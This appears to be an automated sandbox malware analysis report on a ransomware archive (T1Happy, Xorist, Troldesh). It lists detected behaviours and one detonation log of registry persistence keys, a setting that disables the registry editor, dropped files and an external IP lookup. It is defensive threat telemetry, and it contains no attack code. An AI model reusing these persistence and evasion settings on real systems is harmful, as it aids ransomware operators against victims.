Malware Analysis Report

2025-01-02 14:35

Sample ID 241122-d7pb9azlfm
Target Batch_10.zip
SHA256 5015af8fb5725c4c9ebac28a890128587b888acddab6cc9ff06e94e782713882
Tags
t1happy credential_access defense_evasion discovery evasion execution impact persistence ransomware spyware stealer trojan troldesh upx macro xorist dropper
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral32

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral31

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5015af8fb5725c4c9ebac28a890128587b888acddab6cc9ff06e94e782713882

Threat Level: Known bad

The file Batch_10.zip was found to be: Known bad.

Malicious Activity Summary

t1happy credential_access defense_evasion discovery evasion execution impact persistence ransomware spyware stealer trojan troldesh upx macro xorist dropper

Process spawned unexpected child process

T1happy family

Modifies WinLogon for persistence

Troldesh, Shade, Encoder.858

T1Happy

Xorist family

Detected Xorist Ransomware

Troldesh family

Modifies boot configuration data using bcdedit

Deletes shadow copies

Renames multiple (2207) files with added filename extension

Renames multiple (5449) files with added filename extension

Renames multiple (5457) files with added filename extension

Renames multiple (1213) files with added filename extension

Drops file in Drivers directory

Download via BitsAdmin

Suspicious Office macro

Disables RegEdit via registry modification

Drops startup file

Unsecured Credentials: Credentials In Files

Reads user/profile data of web browsers

Modifies file permissions

Reads data files stored by FTP clients

Impair Defenses: Safe Mode Boot

Loads dropped DLL

Credentials from Password Stores: Windows Credential Manager

Executes dropped EXE

Drops desktop.ini file(s)

Adds Run key to start application

Checks installed software on the system

Looks up external IP address via web service

Network Share Discovery

Sets desktop wallpaper using registry

Suspicious use of SetThreadContext

Drops file in System32 directory

Hide Artifacts: Hidden Files and Directories

UPX packed file

Drops file in Program Files directory

Drops file in Windows directory

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Unsigned PE

System Network Configuration Discovery: Internet Connection Discovery

Program crash

Browser Information Discovery

Office loads VBA resources, possible macro or embedded object present

Suspicious use of WriteProcessMemory

Modifies Internet Explorer settings

Modifies registry class

Uses Volume Shadow Copy service COM API

Suspicious use of FindShellTrayWindow

Modifies registry key

Suspicious use of SendNotifyMessage

System policy modification

Interacts with shadow copies

Kills process with taskkill

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

NTFS ADS

Suspicious use of AdjustPrivilegeToken

Views/modifies file attributes

Suspicious behavior: AddClipboardFormatListener

Suspicious behavior: RenamesItself

Runs ping.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-22 03:39

Signatures

Detected Xorist Ransomware

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xorist family

xorist

Suspicious Office macro

macro
Description Indicator Process Target
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral12

Detonation Overview

Submitted

2024-11-22 03:39

Reported

2024-11-22 03:44

Platform

win7-20240903-en

Max time kernel

299s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe"

Signatures

T1Happy

trojan ransomware t1happy

T1happy family

t1happy

Deletes shadow copies

ransomware defense_evasion impact execution

Renames multiple (5449) files with added filename extension

ransomware

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A

Credentials from Password Stores: Windows Credential Manager

credential_access stealer

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Cortana = "C:\\Users\\Admin\\AppData\\Local\\Temp\\T1_b7afca788487347804156f052c613db5.exe" C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\Cortana = "C:\\Users\\Admin\\AppData\\Local\\Temp\\T1_b7afca788487347804156f052c613db5.exe" C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File created C:\Program Files (x86)\desktop.ini C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Desktop.ini C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File created C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099183.WMF C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0216570.WMF C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TN00011_.WMF C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WING2.WMF C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Style\SIST02.XSL C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\es\System.Data.Services.resources.dll C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\WINWORD.DEV.HXS C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR14F.GIF C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\ACEERR.DLL C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0153299.WMF C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0200383.WMF C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File created C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18237_.WMF C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10268_.GIF C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GRAPH_F_COL.HXK C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21348_.GIF C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\QuickStyles\Fancy.dotx C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Templates\1033\OriginMergeLetter.Dotx C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\logo.png C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsHomePage.html C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-new.png C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\NETWORK\PREVIEW.GIF C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107090.WMF C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0179963.JPG C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0216600.WMF C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File created C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0297749.WMF C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\CALENDAR.GIF C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\OUTLLIBR.DLL.IDX_DLL C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\form_edit.js C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.MY.XML C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File created C:\Program Files (x86)\Windows Media Player\WMPDMC.exe C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_box_top.png C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\item_hover_flyout.png C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0185842.WMF C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00199_.WMF C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\Places\BUZZ.WAV C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.JP.XML C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\BANNER.DPV C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File created C:\Program Files (x86)\Internet Explorer\SIGNUP\install.ins C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0150861.WMF C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0153514.WMF C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00389_.WMF C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\3082\MSO.ACL C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\it\PresentationBuildTasks.resources.dll C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Explorer.zip C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\GRPHFLT\GIFIMP32.FLT C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Help\NamedURLs.HxK C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\CASCADE\CASCADE.ELM C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TN00411_.WMF C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\VelvetRose.css C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\LINE.JPG C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\SWBELL.NET.XML C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\de\PresentationBuildTasks.resources.dll C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PARNT_08.MID C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0186348.WMF C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\XLCALL32.DLL C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR14F.GIF C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR51B.GIF C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BabyBlue.css C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\de\UIAutomationClient.resources.dll C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10265_.GIF C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21310_.GIF C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\bg_Casual.gif C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME08.CSS C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_FormsHomePage.gif C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\takeown.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1_b7afca788487347804156f052c613db5.exe N/A
